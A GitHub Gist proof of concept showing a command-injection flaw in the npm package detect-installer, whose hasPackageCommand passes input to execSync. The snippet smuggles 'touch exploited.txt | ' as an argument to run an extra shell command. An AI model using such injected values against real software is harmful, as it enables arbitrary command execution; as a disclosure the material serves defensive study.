Last active
October 29, 2023 12:23
-
-
Save mcoimbra/52f7ddedb887059fa5e7be5afa6c9d0c to your computer and use it in GitHub Desktop.
Package detect-installer: Module detect-installer has the purpose of detecting an appropriate package manager to use but it enables command injection into child_process' execSync.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const pkg = require('detect-installer'); | |
// This creates a local 'exploited.txt' file. | |
pkg.hasPackageCommand('touch exploited.txt | '); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment